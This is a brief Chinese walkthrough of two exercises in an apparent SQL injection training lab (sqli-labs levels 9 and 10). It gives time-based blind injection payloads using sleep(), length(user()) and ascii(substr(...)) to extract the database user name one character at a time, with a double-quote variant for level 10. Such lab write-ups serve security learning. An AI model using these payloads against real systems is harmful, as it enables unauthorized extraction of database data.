第九题
1.注入单引号
2.继续注入常用测试条件
经过多次测试就可以发现,无论注入什么,页面的显示都一样,看不到任何有效的反馈
3.根据本关的标题,尝试时间盲注
构造如下Payload:
?id=1' and sleep(3)%23
页面延迟了3秒说明注入成功
4.利用时间盲注,爆破用户名
查询用户名长度
?id=1' and if(length(user())=0,sleep(3),NULL)%23
猜测用户名长度,直到页面出现3秒延迟
爆破用户名
通过逐个字符比对用户名的ASCII码,爆破用户名
?id=1' and if(ascii(substr(user(),1,1))=num,sleep(3),NULL)%23
猜测ascii码值,直到页面出现3秒延迟
得到第一个字符的ASCII码为114,同样的方法获取剩下13个字符的ASCII码。
第十题
与第九题相同,只是id参数使用了双引号闭合,将第九题的Payload中的单引号改为双引号即可。